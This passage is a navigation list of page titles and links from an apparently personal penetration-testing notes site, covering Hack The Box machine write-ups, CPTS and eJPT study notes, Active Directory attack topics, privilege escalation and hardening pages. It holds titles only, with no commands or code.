Payloads\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads.md) - \[Shells and Payloads\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/shells-and-payloads.md) - \[Metasploit Framework\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework.md) - \[File Transfers\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/file-transfers.md) - \[Pivoting, Tunneling, Port Forwarding\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/pivoting-tunneling-port-forwarding.md) - \[Password Attacks\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/password-attacks.md) - \[Spawn TTY Shells\](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/spawn\_tty\_shell.md) - \[CTFs\](https://x3m1sec.gitbook.io/notes/ctfs.md) - \[Hack The Box\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box.md) - \[Linux\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux.md) - \[Easy\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy.md) - \[Busqueda\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/busqueda.md) - \[Help\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/help.md) - \[Sau\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/sau.md) - \[Broker\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/broker.md) - \[Sea\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/sea.md) - \[Nibbles\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/nibbles.md) - \[Codify\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/codify.md) - \[Cozyhosting\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/cozyhosting.md) - \[Devvortex\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/devvortex.md) - \[Irked\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/irked.md) - \[Keeper\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/keeper.md) - \[Knife\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/knife.md) - \[Pilgrimage\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/pilgrimage.md) - \[Soccer\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/soccer.md) - \[Sunday\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/sunday.md) - \[Tabby\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/tabby.md) - \[Usage\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/usage.md) - \[Bashed\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/bashed.md) - \[Analytics\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/analytics.md) - \[Networked\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/networked.md) - \[Swagshop\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/swagshop.md) - \[Pandora\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/pandora.md) - \[OpenAdmin\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/openadmin.md) - \[Precious\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/precious.md) - \[Boardlight\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/boardlight.md) - \[Editorial\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/editorial.md) - \[Linkvortex\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/linkvortex.md) - \[Underpass\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/easy/underpass.md) - \[Medium\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium.md) - \[Monitored\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/monitored.md) - \[Updown\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/updown.md) - \[Popcorn\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/popcorn.md) - \[Jarvis\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/jarvis.md) - \[Mentor\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/mentor.md) - \[Poison\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/poison.md) - \[Solidstate\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/solidstate.md) - \[Tartarsauce\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/tartarsauce.md) - \[Nineveh\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/nineveh.md) - \[Magic\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/magic.md) - \[Builder\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/medium/builder.md) - \[Hard\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/linux/hard.md) - \[Windows\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows.md) - \[Easy\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy.md) - \[Jerry\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/jerry.md) - \[NetMon\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/netmon.md) - \[Servmon\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/servmon.md) - \[Bounty\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/bounty.md) - \[Arctic\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/arctic.md) - \[Buff\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/buff.md) - \[Love\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/love.md) - \[Access\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/access.md) - \[Mailing\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/mailing.md) - \[Heist\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/heist.md) - \[Active\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/active.md) - \[Forest\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/forest.md) - \[Sauna\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/sauna.md) - \[Timelapse\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/timelapse.md) - \[Return\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/return.md) - \[Cicada\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/cicada.md) - \[EscapeTwo\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/easy/escapetwo.md) - \[Medium\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium.md) - \[Chatterbox\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/chatterbox.md) - \[Jeeves\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/jeeves.md) - \[Sniper\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/sniper.md) - \[Querier\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/querier.md) - \[Giddy\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/giddy.md) - \[Remote\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/remote.md) - \[SecNotes\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/secnotes.md) - \[Monteverde\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/monteverde.md) - \[Administrator\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/administrator.md) - \[Certified\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/certified.md) - \[Thefrizz\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/thefrizz.md) - \[Escape\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/medium/escape.md) - \[Hard\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/hard.md) - \[Blackfield\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/hard/blackfield.md) - \[Flight\](https://x3m1sec.gitbook.io/notes/ctfs/hack-the-box/windows/hard/flight.md) - \[TryHackMe\](https://x3m1sec.gitbook.io/notes/ctfs/tryhackme.md) - \[Road to certification\](https://x3m1sec.gitbook.io/notes/my-certifications.md) - \[eJPTv2\](https://x3m1sec.gitbook.io/notes/my-certifications/ejpt.md) - \[My review\](https://x3m1sec.gitbook.io/notes/my-certifications/ejpt/ejptv2.md) - \[CPTS\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts.md) - \[My review\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/cpts.md) - \[Notes\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes.md) - \[Enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/enumeration.md) - \[Enum Cheklist\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/enumeration/enum-checklist.md) - \[Initial Enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/enumeration/initial-enumeration.md) - \[Nmap\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/nmap.md) - \[Nmap Full Flag\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/nmap/nmap-full-flag.md) - \[Protocol Scan\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/nmap/protocol-scan.md) - \[Scan-network-with-nmap\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/nmap/scan-network-with-nmap.md) - \[Attacking Common Applications\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications.md) - \[1.Content Management Systems (CMS)\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms.md) - \[1.-Wordpress-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms/1.-wordpress-discovery-and-enumeration.md) - \[2.-Attacking-wordpress\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms/2.-attacking-wordpress.md) - \[3.-Joomla-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms/3.-joomla-discovery-and-enumeration.md) - \[4.-Attacking-joomla\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms/4.-attacking-joomla.md) - \[5.-Drupal-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms/5.-drupal-discovery-and-enumeration.md) - \[6.-Attacking-drupal\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/1.content-management-systems-cms/6.-attacking-drupal.md) - \[2. Servlet Containers and Software Development\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/2.-servlet-containers-and-software-development.md) - \[10.-Attacking-jenkins\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/2.-servlet-containers-and-software-development/10.-attacking-jenkins.md) - \[7.-Tomcat-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/2.-servlet-containers-and-software-development/7.-tomcat-discovery-and-enumeration.md) - \[8.-Attacking-tomcat\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/2.-servlet-containers-and-software-development/8.-attacking-tomcat.md) - \[Attacking Jenkins - Focused Commands & Key Points\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/2.-servlet-containers-and-software-development/9.-jenkins-discovery-and-enumeration.md) - \[3. Infrastructure and Network Monitoring Tools\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/3.-infrastructure-and-network-monitoring-tools.md) - \[11.-Aplunk-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/3.-infrastructure-and-network-monitoring-tools/11.-splunk-discovery-and-enumeration.md) - \[12.-Attacking-splunk\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/3.-infrastructure-and-network-monitoring-tools/12.-attacking-splunk.md) - \[13.Prtg-network-monitor\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/3.-infrastructure-and-network-monitoring-tools/13.prtg-network-monitor.md) - \[4. Customer Service Mgmt & Configuration Management\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/4.-customer-service-mgmt-and-configuration-management.md) - \[14.-Osticket\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/4.-customer-service-mgmt-and-configuration-management/14.-osticket.md) - \[15.Gitlab-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/4.-customer-service-mgmt-and-configuration-management/15.gitlab-discovery-and-enumeration.md) - \[16.-Attacking-gitlab\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/4.-customer-service-mgmt-and-configuration-management/16.-attacking-gitlab.md) - \[5. Common Gateway Interfaces\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/5.-common-gateway-interfaces.md) - \[17.-Attacking-tomcat-cgi\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/5.-common-gateway-interfaces/17.-attacking-tomcat-cgi.md) - \[18.-Attacking-cgi-applications-shellshock\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/5.-common-gateway-interfaces/18.-attacking-cgi-applications-shellshock.md) - \[6. Thick Client Applications\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/6.-thick-client-applications.md) - \[19.-Attacking-thick-client-applications\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/6.-thick-client-applications/19.-attacking-thick-client-applications.md) - \[20.Exploiting-web-vulnerabilities-in-thick-client-applications\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/6.-thick-client-applications/20.exploiting-web-vulnerabilities-in-thick-client-applications.md) - \[7. Miscellaneous Applications\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications.md) - \[21.-Coldfusion-discovery-and-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/21.-coldfusion-discovery-and-enumeration.md) - \[ColdFusion Exploitation Guide\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/22.attacking-coldfusion.md) - \[23.-IIS-tilde-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/23.-iis-tilde-enumeration.md) - \[24.Attacking-ldap\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/24.attacking-ldap.md) - \[25.-Web-mass-assignment-vulnerabilities\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/25.-web-mass-assignment-vulnerabilities.md) - \[26.Attacking-applications-connecting-to-services\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/26.attacking-applications-connecting-to-services.md) - \[27.Other-notable-applications\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/7.-miscellaneous-applications/27.other-notable-applications.md) - \[8. Closing Out\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/8.-closing-out.md) - \[28.Application-hardening\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-applications/8.-closing-out/28.application-hardening.md) - \[Attacking Common Services\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services.md) - \[1.Protocol-specific-attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/1.protocol-specific-attacks.md) - \[2.FTP\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/2.ftp.md) - \[3.SMB\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/3.smb.md) - \[4.SQL-databases\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/4.sql-databases.md) - \[5.RDP\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/5.rdp.md) - \[6.DNS\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/6.dns.md) - \[7.SMTP\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/attacking-common-services/7.smtp.md) - \[Active Directory Enumeration & Attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks.md) - \[0. AD Pentest\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/0.-ad-pentest.md) - \[Quick Guide To AD Pentesting\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/0.-ad-pentest/quick-guide-to-ad-pentesting.md) - \[Active Directory: Full Attack Name\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/0.-ad-pentest/active-directory-full-attack-name.md) - \[Active Directory Advanced Concepts\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/0.-ad-pentest/active-directory-advanced-concepts.md) - \[Active Directory Delegation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/0.-ad-pentest/active-directory-delegation.md) - \[Beyond-Active-Directory\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/0.-ad-pentest/beyond-active-directory.md) - \[1.Initial Enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/1.initial-enumeration.md) - \[1.External Recon and Enumeration Principles\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/1.initial-enumeration/1.external-recon-and-enumeration-principles.md) - \[1.initial-enumeration-of-the-domain\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/1.initial-enumeration/2.initial-enumeration-of-the-domain.md) - \[Active-Directory-Basic-Command\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/1.initial-enumeration/active-directory-basic-command.md) - \[2.Sniffing out a Foothold\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/2.sniffing-out-a-foothold.md) - \[3. LLMNR-NBT-NS Poisoning - from Linux\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/2.sniffing-out-a-foothold/3.-llmnr-nbt-ns-poisoning-from-linux.md) - \[4.LLMNR-NBT-NS Poisoning - from Windows\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/2.sniffing-out-a-foothold/4.llmnr-nbt-ns-poisoning-from-windows.md) - \[3.Sighting In, Hunting For A User\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/3.sighting-in-hunting-for-a-user.md) - \[5.Password Spraying Overview\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/3.sighting-in-hunting-for-a-user/5.password-spraying-overview.md) - \[6.Enumerating & Retrieving Password Policies\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/3.sighting-in-hunting-for-a-user/6.enumerating-and-retrieving-password-policies.md) - \[7.Password Spraying - Making a Target User List\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/3.sighting-in-hunting-for-a-user/7.password-spraying-making-a-target-user-list.md) - \[4.Spray Responsibly\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/4.spray-responsibly.md) - \[8. Internal Password Spraying - from Linux\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/4.spray-responsibly/8.-internal-password-spraying-from-linux.md) - \[9.Internal Password Spraying - from Windows\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/4.spray-responsibly/9.internal-password-spraying-from-windows.md) - \[5.Deeper Down the Rabbit Hole\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/5.deeper-down-the-rabbit-hole.md) - \[10. Enumerating Security Controls\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/5.deeper-down-the-rabbit-hole/10.-enumerating-security-controls.md) - \[11. Credentialed Enumeration - from Linux\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/5.deeper-down-the-rabbit-hole/11.-credentialed-enumeration-from-linux.md) - \[12.Credentialed Enumeration - from Windows\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/5.deeper-down-the-rabbit-hole/12.credentialed-enumeration-from-windows.md) - \[13. Living Off the Land\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/5.deeper-down-the-rabbit-hole/13.-living-off-the-land.md) - \[6.Cooking with Fire\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/6.cooking-with-fire.md) - \[14.Kerberoasting - from Linux\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/6.cooking-with-fire/14.kerberoasting-from-linux.md) - \[15. Kerberoasting - from Windows\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/6.cooking-with-fire/15.-kerberoasting-from-windows.md) - \[Kerberoasting Attack Step by Step Guide\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/6.cooking-with-fire/kerberoasting-attack-step-by-step-guide.md) - \[Kerberoasting Attack Step by Step Guide\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/6.cooking-with-fire/kerberoasting-attack-steps-and-commands.md) - \[7.An ACE in the Hole\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/7.an-ace-in-the-hole.md) - \[16.Access Control List (ACL) Abuse Primer\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/7.an-ace-in-the-hole/16.access-control-list-acl-abuse-primer.md) - \[17. ACL Enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/7.an-ace-in-the-hole/17.-acl-enumeration.md) - \[18. ACL Abuse Tactics\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/7.an-ace-in-the-hole/18.-acl-abuse-tactics.md) - \[19. DCSync\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/7.an-ace-in-the-hole/19.-dcsync.md) - \[8.Stacking The Deck\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/8.stacking-the-deck.md) - \[20.Privileged Access\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/8.stacking-the-deck/20.privileged-access.md) - \[21.Kerberos Double Hop Problem\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/8.stacking-the-deck/21.kerberos-double-hop-problem.md) - \[22.Bleeding Edge Vulnerabilities\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/8.stacking-the-deck/22.bleeding-edge-vulnerabilities.md) - \[23.Miscellaneous Misconfigurations\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/8.stacking-the-deck/23.miscellaneous-misconfigurations.md) - \[9.Why So Trusting\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/9.why-so-trusting.md) - \[24.Domain Trusts Primer\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/9.why-so-trusting/24.domain-trusts-primer.md) - \[25.Attacking Domain Trusts - Child - Parent Trusts - from Windows\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/9.why-so-trusting/25.attacking-domain-trusts-child-parent-trusts-from-windows.md) - \[26. Attacking Domain Trusts - Child - Parent Trusts - from Linux\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/9.why-so-trusting/26.-attacking-domain-trusts-child-parent-trusts-from-linux.md) - \[10.Breaking Down Boundaries\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/10.breaking-down-boundaries.md) - \[27.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/10.breaking-down-boundaries/27.attacking-domain-trusts-cross-forest-trust-abuse-from-windows.md) - \[28.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/10.breaking-down-boundaries/28.attacking-domain-trusts-cross-forest-trust-abuse-from-linux.md) - \[11.Defensive Considerations\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/11.defensive-considerations.md) - \[29.Hardening-active-directory\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/11.defensive-considerations/29.hardening-active-directory.md) - \[30.Additional AD Auditing Techniques\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/active-directory-enumeration-and-attacks/11.defensive-considerations/30.additional-ad-auditing-techniques.md) - \[Linux Privilege Escalation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation.md) - \[Linux-hardening\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/linux-hardening.md) - \[Linux-priv-esc-to-quick-check-the-system\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/linux-priv-esc-to-quick-check-the-system.md) - \[1.Information Gathering\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/linux-priv-esc-to-quick-check-the-system/1.information-gathering.md) - \[1.Environment-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/linux-priv-esc-to-quick-check-the-system/1.environment-enumeration.md) - \[2.Linux-services-and-internals-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/linux-priv-esc-to-quick-check-the-system/2.linux-services-and-internals-enumeration.md) - \[3.Credential-hunting\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/linux-priv-esc-to-quick-check-the-system/3.credential-hunting.md) - \[2.Environment-based Privilege Escalation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/2.environment-based-privilege-escalation.md) - \[4.Path-abuse\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/2.environment-based-privilege-escalation/4.path-abuse.md) - \[5.Wildcard-abuse\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/2.environment-based-privilege-escalation/5.wildcard-abuse.md) - \[6.Escaping-restricted-shells\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/2.environment-based-privilege-escalation/6.escaping-restricted-shells.md) - \[3.Permissions-based Privilege Escalation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/3.permissions-based-privilege-escalation.md) - \[10.Capabilities\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/3.permissions-based-privilege-escalation/10.capabilities.md) - \[7.-Special-permissions\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/3.permissions-based-privilege-escalation/7.-special-permissions.md) - 